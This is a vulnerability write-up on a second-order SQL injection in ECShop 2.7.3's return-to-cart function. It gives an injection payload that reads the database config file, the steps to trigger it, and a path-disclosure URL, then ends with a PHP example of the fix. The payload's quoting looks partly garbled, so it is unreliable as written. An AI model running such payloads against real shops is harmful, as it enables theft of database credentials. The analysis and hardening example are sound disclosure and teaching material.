A second-order SQL injection of the INSERT type that can directly read database administrator information.
Exploitation process: find a product to purchase and change the value of the color radio button to 2'), ('6', 'c4598c001520.d28cfcb267fffc750fd', '13', 'ecs000013 ′, mid (load_file ('C:/wamp/www/ec/data/config. php '), 70,120), '123. 20', '100', '3', ", '1',", '0', '0', '0', '100')-
Save, settle, and submit the order. Then go to the user center, find the order, open it, and click "put back to shopping cart".
The injection has been triggered. Let's go to the shopping cart.
Database information.
Affected version: ECShop_V2.7.3_UTF8_release1106
Whether login is required:
Whether the default configuration is used:
Whether code is used: code
Vulnerability details:
A path disclosure vulnerability is also provided to help obtain the physical location of the database configuration file: /install/templates/active.php
Cause of the vulnerability: \includes\lib_transaction.php, function return_to_cart($order_id). See the following code.
// The item to return to the shopping cart
$return_goods = array(
    'goods_id'       => $row['goods_id'],
    'goods_sn'       => addslashes($goods['goods_sn']),
    'goods_name'     => addslashes($goods['goods_name']),
    'market_price'   => $goods['market_price'],
    'goods_price'    => $goods['goods_price'],
    'goods_number'   => $row['goods_number'],
    'goods_attr'     => empty($row['goods_attr']) ? '' : addslashes($row['goods_attr']),
    'goods_attr_id'  => empty($row['goods_attr_id']) ? '' : $row['goods_attr_id'],
    'is_real'        => $goods['is_real'],
    'extension_code' => addslashes($goods['extension_code']),
    'parent_id'      => '0',
    'is_gift'        => '0',
    'rec_type'       => CART_GENERAL_GOODS
);
goods_attr_id is read back from the database and holds the illegal data stored when the earlier order was submitted. Unlike the neighbouring string fields, it is not passed through addslashes() before the array reaches the insert:
$GLOBALS['db']->autoExecute($GLOBALS['ecs']->table('cart'), $return_goods, 'insert');
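The trust failure described above, as an added example that is not ECShop code: a value stored safely at order time is read back and concatenated into a second INSERT, next to a hardened version that validates and binds it. The two-column tables, the function names, the constructed sample value and the use of SQLite in place of MySQL are all assumptions made for the illustration.

```php
<?php
// Added example, not ECShop code. Tables are simplified; SQLite stands in for MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE order_goods (goods_id INTEGER, goods_attr_id TEXT)");
$db->exec("CREATE TABLE cart (goods_id INTEGER, goods_attr_id TEXT)");

// Order submission: the value is bound correctly, so it is stored verbatim,
// quote included. Constructed sample value that only adds a harmless extra row.
$stored = "2'), (6, 'extra-row') -- ";
$db->prepare("INSERT INTO order_goods VALUES (?, ?)")->execute([13, $stored]);

function cart_rows(PDO $db): int
{
    return (int) $db->query("SELECT COUNT(*) FROM cart")->fetchColumn();
}

// Mirrors the flaw: a value read back from the database is treated as trusted
// and concatenated into the INSERT without escaping.
function return_to_cart_unsafe(PDO $db): int
{
    $row = $db->query("SELECT * FROM order_goods")->fetch(PDO::FETCH_ASSOC);
    $db->exec("INSERT INTO cart (goods_id, goods_attr_id) VALUES ("
        . (int) $row['goods_id'] . ", '" . $row['goods_attr_id'] . "')");
    return cart_rows($db);
}

// Hardened: allow-list the expected shape (assumed here to be comma-separated
// integer ids) and bind every value, whatever its origin.
function return_to_cart_safe(PDO $db): int
{
    $row = $db->query("SELECT * FROM order_goods")->fetch(PDO::FETCH_ASSOC);
    if (!preg_match('/^\d+(,\d+)*$/D', $row['goods_attr_id'])) {
        return cart_rows($db); // reject: nothing is inserted
    }
    $db->prepare("INSERT INTO cart (goods_id, goods_attr_id) VALUES (?, ?)")
       ->execute([(int) $row['goods_id'], $row['goods_attr_id']]);
    return cart_rows($db);
}

// The unsafe path turns one cart item into several rows; the safe path adds none.
echo "unsafe: ", return_to_cart_unsafe($db), " rows\n";
$db->exec("DELETE FROM cart");
echo "safe:   ", return_to_cart_safe($db), " rows\n";
```

Escaping on the way into the database does not make a value safe on the way out: every query that reuses stored data needs its own binding or escaping.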